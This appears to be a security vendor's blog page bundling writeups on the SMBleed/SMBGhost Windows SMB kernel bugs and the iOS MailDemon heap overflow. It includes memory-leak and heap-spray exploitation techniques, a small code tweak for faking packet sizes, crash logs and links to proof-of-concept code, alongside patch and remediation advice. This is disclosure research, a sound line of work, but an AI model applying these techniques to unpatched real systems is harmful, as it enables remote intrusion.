Let’s say that we want to read a byte at offset 0x1100 (we’ll see why we want to go that far in the third part of the writeup). We can’t do it directly with our technique, but we found the following solution: since the buffers get reused from the lookaside lists, we can “lift up” the target byte via the decompression function by setting the Offset field to point beyond that byte. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

The incoming packet buffer contains extra 16 header bytes which aren’t copied over when the decompression takes place. As a result, the copied data, including the target byte, is copied to a location 16 bytes closer to the beginning of the allocated buffer. We can repeat that several times, until the target byte offset is low enough.

Address leak POC

You can find a script that demonstrates the above technique here. Remember that we assumed that the target computer has only one logical processor, so you’ll have to configure your VM properly to get the script working. If all goes well, the script will read and print an address from the NonPagedPoolNx pool. In fact, that would be the address of one of the buffers residing in one of the lookaside lists.

A different approach – decompression

While advancing with our research, we realized that the decompressed SMB packet is not the only complex structure that can be invalid in various ways. Even before handling all of the SMB-related structures, the compressed buffer can be invalid as well. If the decompression fails, the connection is dropped, which can be detected.

Microsoft’s SMB implementation offers three compression algorithms to choose from: LZNT1, Plain LZ77 and LZ77+Huffman. We looked at LZNT1 since it’s the first in the list, and it’s rather simple – about 80 Python lines for a decompression function. Without diving too much into details, the compressed data consists of a sequence of compressed blocks, each beginning with a uint16 variable marking its length. When a length of zero is encountered, the decompression completes (similar to a NULL-terminated string, but it’s optional). Also, conveniently, a range of zero bytes represents valid compressed data. With the above, we managed to answer the same question as we did with the previous approach: Given a byte at offset x, is the value larger than y? Here, too, x and y are controlled by us.

We accomplished that by sending a valid packed which is followed by a range of bytes similar to the following (note that it’s a simplification, the actual byte values are a bit different):

There are two possible outcomes depending on the uninitialized value of the least significant byte of the length field:

  • length <= y: In this case the whole compressed block will consist out of zero bytes, which is completely valid, and the next block’s length will be zero, completing the decompression successfully. The server will return a response.
  • length > y: In this case, either the first or the second compression block will contain 0xFF bytes, which will fail the decompression. The server will drop the connection.

Just like with the previous technique, we can use observations #1 and #2 to craft a message with an uninitialized byte in the middle of the message by using two steps:

  1. Send a message with invalid compressed data such that only the part we need is extracted. The bytes that will be extracted are the bytes in the image above.
  2. Send a second message, but make sure that the same lookaside list is used for the allocation, so that the bytes from step 1 will be there.

Note that the Offset value in the SMB packet header will point to the compressed data, which can be valid or not depending on the value of the initialized byte. The valid SMB packet will be sent uncompressed. Note also that since the Offset value is larger than the message itself, there’s an overflow in the calculation of the compressed data size, which ends up being a huge number. Usually that’s not an issue since the decompression ends quickly, either successfully or not. But sometimes the system crashes due to an out of bounds read. We didn’t try to solve this since it happens rarely, and the POC is complex enough.

The most notable advantage of this technique compared to the previous one is that there’s no offset limitation anymore. Even though we managed to overcome the limitation, it required sending a large number of packets, hurting performance and stability.

ZecOps Detection

ZecOps classify forensics logs related to this issue as the following tags #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security issues (recommended)
  • Block port 445 / enforce host-isolation
  • Disable SMBv3.1.1 compression

Part II – Summary

In this part, we described how we managed to read uninitialized data from the kernel pool, remotely and without authentication, by exploiting SMBGhost and SMBleed. In the third part we’ll show how it helped us achieve RCE.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

SMBleedingGhost Writeup: Chaining SMBleed (CVE-2020-1206) with SMBGhost

SMBleedingGhost Writeup: Chaining SMBleed (CVE-2020-1206) with SMBGhost

TL;DR

  • While looking at the vulnerable function of SMBGhost, we discovered another vulnerability: SMBleed (CVE-2020-1206).
  • SMBleed allows to leak kernel memory remotely.
  • Combined with SMBGhost, which was patched three months ago, SMBleed allows to achieve pre-auth Remote Code Execution (RCE).
  • POC #1: SMBleed remote kernel memory read: POC #1 Link
  • POC #2: Pre-Auth RCE Combining SMBleed with SMBGhost: POC #2 Link

Introduction

The SMBGhost (CVE-2020-0796) bug in the compression mechanism of SMBv3.1.1 was fixed about three months ago. In our previous writeup we explained the bug, and demonstrated a way to exploit it for local privilege escalation. As we found during our research, it’s not the only bug in the SMB decompression functionality. SMBleed happens in the same function as SMBGhost. The bug allows an attacker to read uninitialized kernel memory, as we illustrated in detail in this writeup.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

An observation

The bug happens in the same function as with SMBGhost, the Srv2DecompressData function in the srv2.sys SMB server driver.  Below is a simplified version of the function, with the irrelevant details omitted:

typedef struct _COMPRESSION_TRANSFORM_HEADER
{
    ULONG ProtocolId;
    ULONG OriginalCompressedSegmentSize;
    USHORT CompressionAlgorithm;
    USHORT Flags;
    ULONG Offset;
} COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER;


typedef struct _ALLOCATION_HEADER
{
    // ...
    PVOID UserBuffer;
    // ...
} ALLOCATION_HEADER, *PALLOCATION_HEADER;


NTSTATUS Srv2DecompressData(PCOMPRESSION_TRANSFORM_HEADER Header, SIZE_T TotalSize)
{
    PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer(
        (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset),
        NULL);
    If (!Alloc) {
        return STATUS_INSUFFICIENT_RESOURCES;
    }


    ULONG FinalCompressedSize = 0;


    NTSTATUS Status = SmbCompressionDecompress(
        Header->CompressionAlgorithm,
        (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset,
        (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset),
        (PUCHAR)Alloc->UserBuffer + Header->Offset,
        Header->OriginalCompressedSegmentSize,
        &FinalCompressedSize);
    if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
        SrvNetFreeBuffer(Alloc);
        return STATUS_BAD_DATA;
    }


    if (Header->Offset > 0) {
        memcpy(
            Alloc->UserBuffer,
            (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
            Header->Offset);
    }


    Srv2ReplaceReceiveBuffer(some_session_handle, Alloc);
    return STATUS_SUCCESS;
}

The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero, it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.

The SMBGhost bug happened due to lack of integer overflow checks. It was fixed by Microsoft and even though we didn’t add it to our function to keep it simple, this time we will assume that the function checks for integer overflows and discards the message in these cases. Even with these checks in place, there’s still a serious bug. Can you spot it?

Faking OriginalCompressedSegmentSize again

Previously, we exploited SMBGhost by setting the OriginalCompressedSegmentSize field to be a huge number, causing an integer overflow followed by an out of bounds write. What if we set it to be a number which is just a little bit larger than the actual decompressed data we send? For example, if the size of our compressed data is x after decompression, and we set OriginalCompressedSegmentSize to be x + 0x1000, we’ll get the following:

The uninitialized kernel data is going to be treated as a part of our message.

If you didn’t read our previous writeup, you might think that the Srv2DecompressData function call should fail due to the check that follows the SmbCompressionDecompress call:

if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
    SrvNetFreeBuffer(Alloc);
    return STATUS_BAD_DATA;
}

Specifically, in our example, you might assume that while the value of the OriginalCompressedSegmentSize field is x + 0x1000, FinalCompressedSize will be set to x in this case. In fact, FinalCompressedSize will be set to x + 0x1000 as well due to the implementation of the SmbCompressionDecompress function:

NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG  UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG  CompressedBufferSize,
    PULONG FinalCompressedSize)
{
    // ...

    NTSTATUS Status = RtlDecompressBufferEx2(
        ...,
        FinalUncompressedSize,
        ...);
    if (status >= 0) {
        *FinalCompressedSize = CompressedBufferSize;
    }

    // ...

    return Status;
}

In case of a successful decompression, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. Not only this seemingly unnecessary, deliberate update of the FinalCompressedSize value made the exploitation of SMBGhost easier, it also allowed the SMBleed bug to exist.

Basic exploitation

The SMB message we used to demonstrate the vulnerability is the SMB2 WRITE message. The message structure contains fields such as the amount of bytes to write and flags, followed by a variable length buffer. That’s perfect for exploiting the bug, since we can craft a message such that we specify the header, but the variable length buffer contains uninitialized data. We based our POC on Microsoft’s WindowsProtocolTestSuites repository (that we also used for the first SMBGhost reproduction), introducing this small addition to the compression function:

// HACK: fake size
if (((Smb2SinglePacket)packet).Header.Command == Smb2Command.WRITE)
{
    ((Smb2WriteRequestPacket)packet).PayLoad.Length += 0x1000;
    compressedPacket.Header.OriginalCompressedSegmentSize += 0x1000;
}

Note that our POC requires credentials and a writable share, which are available in many scenarios, but the bug applies to every message, so it can potentially be exploited without authentication. Also note that the leaked memory is from previous allocations in the NonPagedPoolNx pool, and since we control the allocation size, we might be able to control the data that is being leaked to some degree.

SMBleed POC Source Code

Affected Windows versions

Windows 10 versions 1903, 1909 and 2004 are affected. During testing, our POC crashed one of our Windows 10 1903 machines. After analyzing the crash with Neutrino we saw that the earliest, unpatched versions of Windows 10 1903 have a null pointer dereference bug while handling valid, compressed SMB packets. Please note, we didn’t investigate further to find whether it’s possible to bypass the null pointer dereference bug and exploit the system.

An unpatched system, null pointer dereference happens here.
A patched system, the added null pointer check.

Here’s a summary of the affected Windows versions with the relevant updates installed:

Windows 10 Version 2004

Update SMBGhost SMBleed
KB4557957 Not Vulnerable Not Vulnerable
Before KB4557957 Not Vulnerable Vulnerable

Windows 10 Version 1909

Update SMBGhost SMBleed
KB4560960 Not Vulnerable Not Vulnerable
KB4551762 Not Vulnerable Vulnerable
Before KB4551762 Vulnerable Vulnerable

Windows 10 Version 1903

Update Null Dereference Bug SMBGhost SMBleed
KB4560960 Fixed Not Vulnerable Not Vulnerable
KB4551762 Fixed Not Vulnerable Vulnerable
KB4512941 Fixed Vulnerable Vulnerable
None of the above Not Fixed Vulnerable Potentially vulnerable*

* We haven’t tried to bypass the null dereference bug, but it may be possible through another method (for example, using SMBGhost Write-What-Where primitive)

SMBleedingGhost? Chaining SMBleed with SMBGhost for pre-auth RCE

Exploiting the SMBleed bug without authentication is less straightforward, but also possible. We were able to use it together with the SMBGhost bug to achieve RCE (Remote Code Execution). A writeup with the technical details will be published soon. For now, please see below a POC demonstrating the exploitation. This POC is released only for educational and research purposes, as well as for  evaluation of security defenses. Use at your own risk. ZecOps takes no responsibility for any misuse of this POC. 

SMBGhost + SMBleed RCE POC Source Code

Detection

ZecOps Neutrino customers detect exploitation of SMBleed & SMBGhost – no further action is required. SMBleed & SMBGhost can be detected in multiple ways, including crash dump analysis, a network traffic analysis. Signatures are available to ZecOps Threat Intelligence subscribers. Feel free to reach out to us at threat_intel@zecops.com for more information.

Remediation

You can remediate both SMBleed and SMBGhost by doing one or more of the following things:

  1. Windows update will solve the issues completely (recommended)
  2. Blocking port 445 will stop lateral movements using these vulnerabilities
  3. Enforcing host isolation
  4. Disabling SMB 3.1.1 compression (not a recommended solution)

Shout out to Chompie that exploited this bug with a different technique. Chompie’s POC is available here.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

Summary and TL;DR

Further to Apple’s patch of the MailDemon vulnerability (see our blog here), ZecOps Research Team has analyzed and compared the MailDemon patches of iOS 13.4.5 beta and iOS 13.5. 

Our analysis concluded  that the patches are different, and that iOS 13.4.5 beta patch was incomplete and could be still vulnerable under certain circumstances. 

Since the 13.4.5 beta patch was insufficient, Apple issued a complete patch utilising a different approach which fixed this issue completely on both iOS 13.5 and iOS 12.4.7 as a special security update for older devices. 

This may explain why it took about one month for a full patch to be released. 

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

iOS 13.4.5 beta patch

The following is the heap-overflow vulnerability patch on iOS 13.4.5 beta.  

The function  -[MFMutableData appendBytes:length:] raises an exception if  -[MFMutableData _mapMutableData] returns false.

In order to see when -[MFMutableData _mapMutableData] returns false, let’s take a look at how it is implemented:

When mmap fails it returns False, but still allocates a 8-bytes chunk and stores the pointer in self->bytes. This patch raises an exception before copying data into self->bytes, which solves the heap overflow issue partially.

 -[MFMutableData appendData:]
 |
 +--  -[MFMutableData appendBytes:length:] **<-patch**
    |
    +-- -[MFMutableData _mapMutableData]

The patch makes sure an exception will be raised inside -[MFMutableData appendBytes:length:]. However, there are other functions that call -[MFMutableData _mapMutableData] and interact with self->bytes which will be an 8-bytes chunk if mmap fails, these functions do not check if mmap fails or not since the patch only affects -[MFMutableData appendBytes:length:].

Following is an actual backtrace taken from MobileMail:

 * frame #0: 0x000000022a0fd018 MIME`-[MFMutableData _mapMutableData:]
    frame #1: 0x000000022a0fc2cc MIME`-[MFMutableData bytes] + 108
    frame #2: 0x000000022a0fc314 MIME`-[MFMutableData mutableBytes] + 52
    frame #3: 0x000000022a0f091c MIME`_MappedAllocatorAllocate + 76
    frame #4: 0x0000000218cd4e9c CoreFoundation`_CFRuntimeCreateInstance + 324
    frame #5: 0x0000000218cee5c4 CoreFoundation`__CFStringCreateImmutableFunnel3 + 1908
    frame #6: 0x0000000218ceeb04 CoreFoundation`CFStringCreateWithBytes + 44
    frame #7: 0x000000022a0eab94 MIME`_MFCreateStringWithBytes + 80
    frame #8: 0x000000022a0eb3a8 MIME`_filter_checkASCII + 84
    frame #9: 0x000000022a0ea7b4 MIME`MFCreateStringWithBytes + 136
-[MFMutableData mutableBytes]
|
+--  -[MFMutableData bytes]
   |
   +--  -[MFMutableData _mapMutableData:]

Since the bytes returned by mutableBytes is usually considered to be modifiable given following from Apple’s documentation:

This property is similar to, but different than the bytes property. The bytes property contains a pointer to a constant. You can use The bytes pointer to read the data managed by the data object, but you cannot modify that data. However, if the mutableBytes property contains a non-null pointer, this pointer points to mutable data. You can use the mutableBytes pointer to modify the data managed by the data object.

Apple’s documentation

Both -[MFMutableData mutableBytes] and -[MFMutableData bytes] returns self->bytes points to the 8-bytes chunk if mmap fails, which might lead to heap overflow under some circumstances.

The following is an example of how things could go wrong, the heap overflow still would happen even if it checks length before memcpy:

size_t length = 0x30000;
MFMutableData* mdata = [MFMutableData alloc];
data = malloc(length);
[mdata initWithBytesNoCopy:data length:length];    
size_t mdata_len = [mdata length];
char* mbytes = [mdata mutableBytes];//mbytes could be a 8-bytes chunk
size_t new_data_len = 90;
char* new_data = malloc(new_data_len);
if (new_data_len <= mdata_len) {
    memcpy(mbytes, new_data, new_data_len);//heap overflow if mmap fails
}

iOS 13.5 Patch

Following the iOS 13.5 patch, an exception is raised in “-[MFMutableData _mapMutableData] ”, right after mmap fails and it doesn’t return the 8-bytes chunk anymore. This approach fixes the issue completely.

Summary

iOS 13.5 patch is the correct way to patch the heap overflow vulnerability. It is important to double check security patches and verify that the patch is complete. 

At ZecOps we help developers to find security weaknesses, and validate if the issue was correctly solved automatically. If you would like to find similar vulnerabilities in your applications/programs, we are now adding additional users to our CrashOps SDK beta program
If you do not own an app, and would like to inspect your phone for suspicious activity – check out ZecOps iOS DFIR solution – Gluon.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Seeing (Mail)Demons? Technique, Triggers, and a Bounty

Seeing (Mail)Demons? Technique, Triggers, and a Bounty

Impact & Key Details (TL;DR)

  1. Demonstrate a way to do a basic heap spray
  2. We were able to use this technique to verify that this vulnerability is exploitable. We are still working on improving the success rate.
  3. Present two new examples of in-the-wild triggers so you can judge by yourself if these bugs worth an out of band patch
  4. Suggestions to Apple on how to improve forensics information / logs and important questions following Apple’s response to the previous disclosure
  5. Launching a bounty program for people who have traces of attacks with total bounties of $27,337
  6. MailDemon appears to be even more ancient than we initially thought. There is a trigger for this vulnerability, in the wild, 10 years ago, on iPhone 2g, iOS 3.1.3

Following our announcement of RCE vulnerabilities discovery in the default Mail application on iOS, we have been contacted by numerous individuals who suspect they were targeted by this and related vulnerabilities in Mail.

ZecOps encourages Apple to release an out of band patch for the recently disclosed vulnerabilities and hopes that this blog will provide additional reinforcement to release patches as early as possible. In this blogpost we will show a simple way to spray the heap, whereby we were able to prove that remote exploitation of this issue is possible, and we will also provide two examples of triggers observed in the wild.

At present, we already have the following:

  • Remote heap-overflow in Mail application
  • Ability to trigger the vulnerability remotely with attacker-controlled input through an incoming mail
  • Ability to alter code execution
  • Kernel Elevation of Privileges 0day

What we don’t have:

  • An infoleak – but therein rests a surprise: an infoleak is not mandatory to be in Mail since an infoleak in almost any other process would be sufficient. Since dyld_shared_cache is shared through most processes, an infoleak vulnerability doesn’t necessarily have to be inside MobileMail, for example CVE-2019-8646 of iMessage can do the trick remotely as well – which opens additional attack surface (Facetime, other apps, iMessage, etc). There is a great talk by 5aelo during OffensiveCon covering similar topics.

Therefore, now we have all the requirements to exploit this bug remotely. Nonetheless, we prefer to be cautious  in chaining this together because:

  • We have no intention of disclosing the LPE – it allows us to perform filesystem extraction / memory inspection on A12 devices and above when needed. You can read more about the problems of analyzing mobile devices at FreeTheSandbox.org
  • We haven’t seen exploitation in the wild for the LPE.

We will also share two examples of triggers that we have seen in the wild and let you make your own inferences and conclusions. 

the mail-demon vulnerability
were you targeted by this vulnerability?

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

MailDemon Bounty

Lastly, we will present a bounty for those submissions that were able to demonstrate that they were attacked.

Exploiting MailDemon

As we previously hinted, MailDemon is a great candidate for exploitation because it overwrites small chunks of a MALLOC_NANO memory region, which stores a large number of Objective-C objects. Consequently, it allows attackers to manipulate an ISA pointer of the corrupted objects (allowing them to cause type confusions) or overwrite a function pointer to control the code flow of the process. This represents a viable approach of taking over the affected process.

Heap Spray & Heap Grooming Technique

In order to control the code flow, a heap spray is required to place crafted data into the memory. With the sprayed fake class containing a fake method cache of ‘dealloc’ method, we were able to control the Program Counter (PC) register after triggering the vulnerability using this method*.

The following is a partial crash log generated while testing our POC:

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0xdeadbeefdeadbeef
VM Region Info: 0xdeadbeefdeadbeef is not in any region.  Bytes after previous region: 16045690973559045872  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      MALLOC_NANO            0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV  
--->  
      UNUSED SPACE AT END

Thread 18 name:  Dispatch queue: com.apple.CFNetwork.Connection
Thread 18 Crashed:
0   ???                           	0xdeadbeefdeadbeef 0 + -2401053088876216593
1   libdispatch.dylib             	0x00000001b7732338 _dispatch_lane_serial_drain$VARIANT$mp  + 612
2   libdispatch.dylib             	0x00000001b7732e74 _dispatch_lane_invoke$VARIANT$mp  + 480
3   libdispatch.dylib             	0x00000001b773410c _dispatch_workloop_invoke$VARIANT$mp  + 1960
4   libdispatch.dylib             	0x00000001b773b4ac _dispatch_workloop_worker_thread  + 596
5   libsystem_pthread.dylib       	0x00000001b796a114 _pthread_wqthread  + 304
6   libsystem_pthread.dylib       	0x00000001b796ccd4 start_wqthread  + 4


Thread 18 crashed with ARM Thread State (64-bit):
    x0: 0x0000000281606300   x1: 0x00000001e4b97b04   x2: 0x0000000000000004   x3: 0x00000001b791df30
    x4: 0x00000002827e81c0   x5: 0x0000000000000000   x6: 0x0000000106e5af60   x7: 0x0000000000000940
    x8: 0x00000001f14a6f68   x9: 0x00000001e4b97b04  x10: 0x0000000110000ae0  x11: 0x000000130000001f
   x12: 0x0000000110000b10  x13: 0x000001a1f14b0141  x14: 0x00000000ef02b800  x15: 0x0000000000000057
   x16: 0x00000001f14b0140  x17: 0xdeadbeefdeadbeef  x18: 0x0000000000000000  x19: 0x0000000108e68038
   x20: 0x0000000108e68000  x21: 0x0000000108e68000  x22: 0x000000016ff3f0e0  x23: 0xa3a3a3a3a3a3a3a3
   x24: 0x0000000282721140  x25: 0x0000000108e68038  x26: 0x000000016ff3eac0  x27: 0x00000002827e8e80
   x28: 0x000000016ff3f0e0   fp: 0x000000016ff3e870   lr: 0x00000001b6f3db9c
    sp: 0x000000016ff3e400   pc: 0xdeadbeefdeadbeef cpsr: 0x60000000

The ideal primitive for heap spray in this case is a memory leak bug that can be triggered from remote, since we want the sprayed memory to stay untouched until the memory corruption is triggered. We left this as an exercise for the reader. Such primitive could qualify for up to $7,337 bounty from ZecOps (read more below).

Another way is using MFMutableData itself – when the size of MFMutableData is less than 0x20000 bytes it allocates memory from the heap instead of creating a file to store the content. And we can control the MFMutableData size by splitting content of the email into lines less than 0x20000 bytes since the IMAP library reads email content by lines. With this primitive we have a better chance to place payload into the address we want.

Trigger

An oversized email is capable of reproducing the vulnerability as a PoC(see details in our previous blog), but for a stable exploit, we need to take a closer look at “-[MFMutableData appendBytes:length:]“

-[MFMutableData appendBytes:length:] 
{
  int old_len = [self length];
  //...
  char* bytes = self->bytes;
  if(!bytes){
     bytes = [self _mapMutableData]; //Might be a data pointer of a size 8 heap
  }
  copy_dst = bytes + old_len;
  //...
  memmove(copy_dst, append_bytes, append_length); // It used append_length to copy the memory, causing an OOB writing in a small heap
}

The destination address of memove is ”bytes + old_len” instead of’ ‘bytes”. So what if we accumulate too much data before triggering the vulnerability? The “old_len” would end up with a very big value so that the destination address will end up in a invalid address which is beyond the edge of this region and crash immediately, given that the size of MALLOC_NANO region is 512MB.


             +----------------+0x280000000
             |                |
   bytes --> +----------------+\
             |                | +
             |                | |
             |                | |
             |    padding     | |
             |                | |
             |                | | old_len
             |                | |
             |                | |
             |                | |
             |                | +
copy_dst --> +----------------+/
             | overflow data  |
             +----------------+
             |                |
             |                |
             |                |
             |                |
             +----------------+0x2a0000000

In order to reduce the size of “padding”, we need to consume as much data as possible before triggering the vulnerability – a memory leak would be one of our candidates.

Noteworthy, the “padding” doesn’t mean the overflow address is completely random, the “padding” is predictable by hardware models since the RAM size is the same, and mmap is usually failed at the same size during our tests.

Crash analysis

This post discusses several triggers and exploitability of the MobileMail vulnerability detected in the wild which we covered in our previous blog.

Case 1 shows that the vulnerability is triggered in the wild before it was disclosed.

Case 2 is due to memory corruption in the MALLOC_NANO region, the value of the corrupted memory is part of the sent email and completely controlled by the sender.

Case 1

The following crash was triggered right inside the vulnerable function while the overflow happens. 

Coalition:           com.apple.mobilemail [521]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000004a35630e //[a]
VM Region Info: 0x4a35630e is not in any region.  Bytes before following region: 3091946738
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      __TEXT                 000000010280c000-0000000102aec000 [ 2944K] r-x/r-x SM=COW  ...p/MobileMail]


Thread 4 Crashed:
0   libsystem_platform.dylib      	0x00000001834a5a80 _platform_memmove  + 208
       0x1834a5a74         ldnp x10, x11, [x1, #16]       
       0x1834a5a78         add x1, x1, 0x20               
       0x1834a5a7c         sub x2, x2, x5                 
       0x1834a5a80         stp x12, x13, [x0]   //[b]          
       0x1834a5a84         stp x14, x15, [x0, #16]        
       0x1834a5a88         subs x2, x2, 0x40              
       0x1834a5a8c         b.ls 0x00002ab0    

1   MIME                          	0x00000001947ae104 -[MFMutableData appendBytes:length:]  + 356
2   Message                       	0x0000000194f6ce6c -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:]  + 804
3   DAEAS                         	0x000000019ac5ca8c -[ASAccount folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 736
4   DAEAS                         	0x000000019aca3fd0 -[ASFolderItemsSyncTask handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 524
5   DAEAS                         	0x000000019acae338 -[ASItem _streamYourLittleHeartOutWithContext:]  + 440
6   DAEAS                         	0x000000019acaf4d4 -[ASItem _streamIfNecessaryFromContext:]  + 96
7   DAEAS                         	0x000000019acaf758 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 164
8   DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
9   DAEAS                         	0x000000019acaf7d8 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 292
10  DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
...

Thread 4 crashed with ARM Thread State (64-bit):
    x0: 0x000000004a35630e   x1: 0x00000001149af432   x2: 0x0000000000001519   x3: 0x000000004a356320
    x4: 0x0000000100000028   x5: 0x0000000000000012   x6: 0x0000000c04000100   x7: 0x0000000114951a00
    x8: 0x44423d30443d3644   x9: 0x443d30443d38463d  x10: 0x3d31413d31443d30  x11: 0x31413d31463d3444
   x12: 0x33423d30453d3043  x13: 0x433d30443d35423d  x14: 0x3d30443d36443d44  x15: 0x30443d38463d4442
   x16: 0x00000001834a59b0  x17: 0x0200080110000100  x18: 0xfffffff00a0dd260  x19: 0x000000000000152b
   x20: 0x00000001149af400  x21: 0x000000004a35630e  x22: 0x000000004a35630f  x23: 0x0000000000000008
   x24: 0x000000000000152b  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x00000001149af400
   x28: 0x000000018dbd34bc   fp: 0x000000016da4c720   lr: 0x00000001947ae104
    sp: 0x000000016da4c720   pc: 0x00000001834a5a80 cpsr: 0x80000000

With [a] and [b] we know that the process crashed inside “memmove” called by “-[MFMutableData appendBytes:length:]”, which means the value of “copy_dst” is an invalid address at first place which is 0x4a35630e.

So where did the value of the register x0 (0x4a35630e) come from? It’s much smaller than the lowest valid address. 

Turns out that the process crashed when after failing to mmap a file and then failing to allocate the 8 byte memory at the same time. 

The invalid address 0x4a35630e is actually the offset which is the length of MFMutableData before triggering the vulnerability(i.e. “old_len”). When calloc fails to allocate the memory it returns NULL, so the copy_dst will be “0 + old_len(0x4a35630e)”. 

In this case the “old_len” is about 1.2GB which matches the average length of our POC which is likely to cause mmap failure and trigger the vulnerability.

Please note that x8-x15, and x0 are fully controlled by the sender.

The crash gives us another answer for our question above: “What if we accumulate too much data before triggering the vulnerability?” – The allocation of the 8-bytes memory could fail and crash while copying the payload to an invalid address. This can make reliable exploitation more difficult, as we may crash before taking over the program counter.

A Blast From The Past: Mysterious Trigger on iOS 3.1.3 in 2010!

Noteworthy, we found a public example of exactly a similar trigger by an anonymous user in modmy.com forums: https://forums.modmy.com/native-iphone-ipod-touch-app-launches-f29/734050-mail-app-keeps-crashing-randomly.html

Vulnerable version: iOS 3.1.3 on iPhone 2G
Time of crash: 22nd of October, 2010

The user “shyamsandeep”, registered on the 12th of June 2008 and last logged in on the 16th of October 2011 and had a single post in the forum, which contained this exact trigger.

This crash had r0 equal to 0x037ea000, which could be the result of the 1st vulnerability we disclosed in our previous blog which was due to ftruncate() failure. Interestingly, as we explained in the first case, it could also be a result of the allocation of 8-bytes memory failure however it is not possible to determine the exact reason since the log lacked memory regions information. Nonetheless, it is certain that there were triggers in the wild for this exploitable vulnerability since 2010.

Identifier: MobileMail
Version: ??? (???)
Code Type: ARM (Native)
Parent Process: launchd [1]

Date/Time: 2010-10-22 08:14:31.640 +0530
OS Version: iPhone OS 3.1.3 (7E18)
Report Version: 104

Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Codes: KERN_INVALID_ADDRESS at 0x037ea000 Crashed Thread: 4
Thread 4 Crashed:
0 libSystem.B.dylib 0x33aaef3c 0x33aad000 + 7996 //memcpy + 0x294
1 MIME 0x30a822a4 0x30a7f000 + 12964 //_FastMemoryMove + 0x44
2 MIME 0x30a8231a 0x30a7f000 + 13082 // -[MFMutableData appendBytes:length:] + 0x6a
3 MIME 0x30a806d6 0x30a7f000 + 5846 // -[MFMutableData appendData:] + 0x32
4 Message 0x342e2938 0x34251000 + 596280 // -[DAMessageContentConsumer consumeData:length:format:mailMessage:] + 0x25c
5 Message 0x342e1ff8 0x34251000 + 593912 // -[DAMailAccountSyncConsumer consumeData:length:format:mailMessage:] +0x24
6 DataAccess 0x34146b22 0x3413e000 + 35618 // -[ASAccount
folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:] + 0x162
7 DataAccess 0x3416657c 0x3413e000 + 165244 //[ASFolderItemsSyncTaskhandleStreamOperation:forCodePage:tag:withParentIt em:withData:dataLength:] + 0x108
...

Thread 4 crashed with ARM Thread State:
r0: 0x037ea000 r1: 0x008729e0 r2: 0x00002205 r3: 0x4e414153
r4: 0x41415367 r5: 0x037e9825 r6: 0x00872200 r7: 0x007b8b78
r8: 0x0001f825 r9: 0x001fc098 r10: 0x00872200 r11: 0x0087c200
ip: 0x0000068a sp: 0x007b8b6c lr: 0x30a822ab pc: 0x33aaef3c
cpsr: 0x20000010

Case 2

Following is another crash that happened after an email was received and processed.

Coalition:           com.apple.mobilemail [308]

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x0041004100410041 // [a]
VM Region Info: 0x41004100410041 is not in any region.  Bytes after previous region: 18296140473139266  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      mapped file            00000002d31f0000-00000002d6978000 [ 55.5M] r--/rw- SM=COW  ...t_id=9bfc1855
--->  
      UNUSED SPACE AT END

Thread 13 name:  Dispatch queue: Internal _UICache queue
Thread 13 Crashed:
0   libobjc.A.dylib               	0x00000001b040fca0 objc_release  + 16
